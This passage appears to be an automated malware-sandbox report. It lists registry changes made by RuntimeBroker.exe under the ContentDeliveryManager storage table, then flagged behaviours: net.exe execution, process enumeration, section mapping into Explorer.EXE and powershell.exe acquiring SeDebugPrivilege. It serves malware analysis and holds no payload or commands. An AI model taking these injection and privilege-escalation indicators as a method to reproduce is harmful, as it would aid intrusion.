Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fbfa43cf-0848-4c2f- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000746f2f8463a7d8013e9b828763a7d8013e9b828763a7d801e78e08000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035596902000373732626338623330613061376237373337343232613632306536333634663434623532353539313835306664396333613537313132393563626235396666340000b20009000400efbe03559690035596902e00000000000000000000000000000000000000000000000000f0197500370037003200620063003800620033003000610030006100370062003700370033003700340032003200610036003200300065003600330036003400660034003400620035003200350035003900310038003500300066006400390063003300610035003700310031003200390035006300620062003500390066006600340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001f5760301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37373262633862333061306137623737333734323261363230653633363466343462353235353931383530666439633361353731313239356362623539666634000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a410370abe908ed11b78d726f482620dfbca7cefcc5848241ae2fb45b654f157a410370abe908ed11b78d726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\37b82531-b0bf-420d- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7704976f-8a79-45c7- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000069b2e98163a7d80169b2e98163a7d80169b2e98163a7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035596902000323963326132353566326566373638363937353036343739303062393965616465386433343430376234306363343932383666333361363765313734633135620000b20009000400efbe03559690035596902e0000000000000000000000000000000000000000000000000097538f00320039006300320061003200350035006600320065006600370036003800360039003700350030003600340037003900300030006200390039006500610064006500380064003300340034003000370062003400300063006300340039003200380036006600330033006100360037006500310037003400630031003500620000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001f5760301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c32396332613235356632656637363836393735303634373930306239396561646538643334343037623430636334393238366633336136376531373463313562000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a3b0370abe908ed11b78d726f482620dfbca7cefcc5848241ae2fb45b654f157a3b0370abe908ed11b78d726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f26f38b6-a9b8-4163- = e41a908b63a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2669fe67-5a16-4185- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000036601c8463a7d80167df968b63a7d80167df968b63a7d80117f519000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035596902000663264393530653135623863383534393739663131343962363866393431636535616336326430396637636238336639346236343862336263623262396464380000b20009000400efbe03559690035596902e00000000000000000000000000000000000000000000000000d62b4a00660032006400390035003000650031003500620038006300380035003400390037003900660031003100340039006200360038006600390034003100630065003500610063003600320064003000390066003700630062003800330066003900340062003600340038006200330062006300620032006200390064006400380000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001f5760301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c66326439353065313562386338353439373966313134396236386639343163653561633632643039663763623833663934623634386233626362326239646438000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a460370abe908ed11b78d726f482620dfbca7cefcc5848241ae2fb45b654f157a460370abe908ed11b78d726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95da6e11-69b9-4234- = 5ae61e8263a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fbfa43cf-0848-4c2f- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cc7c23c5-8053-49d2- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e79f10a1-5129-43d7- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\226f698dd5def1e53f14883a61dd2000a2581aee75765a4f31a9ac7d198c1474" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\29c2a255f2ef76869750647900b99eade8d34407b40cc49286f33a67e174c15b" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8a87cb30-55b8-4a12- = 737e398263a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95da6e11-69b9-4234- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8a87cb30-55b8-4a12- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\f2d950e15b8c854979f1149b68f941ce5ac62d09f7cb83f94b648b3bcb2b9dd8" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8a87cb30-55b8-4a12- C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95da6e11-69b9-4234- C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bfc5aaf5-2e5b-480b- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8a87cb30-55b8-4a12- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8a87cb30-55b8-4a12- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000d5ec228263a7d801d5ec228263a7d801d5ec228263a7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035596902000313937626664663938623930663135363830343766353339303231353937643331376564303261373266646130333532636237383736343431333435383737300000b20009000400efbe03559690035596902e000000000000000000000000000000000000000000000000002b195600310039003700620066006400660039003800620039003000660031003500360038003000340037006600350033003900300032003100350039003700640033003100370065006400300032006100370032006600640061003000330035003200630062003700380037003600340034003100330034003500380037003700300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001f5760301000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c31393762666466393862393066313536383034376635333930323135393764333137656430326137326664613033353263623738373634343133343538373730000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157a3e0370abe908ed11b78d726f482620dfbca7cefcc5848241ae2fb45b654f157a3e0370abe908ed11b78d726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2669fe67-5a16-4185- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = 41edf18163a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95da6e11-69b9-4234- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fbfa43cf-0848-4c2f- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\335a8887-fb30-4439- C:\Windows\System32\RuntimeBroker.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
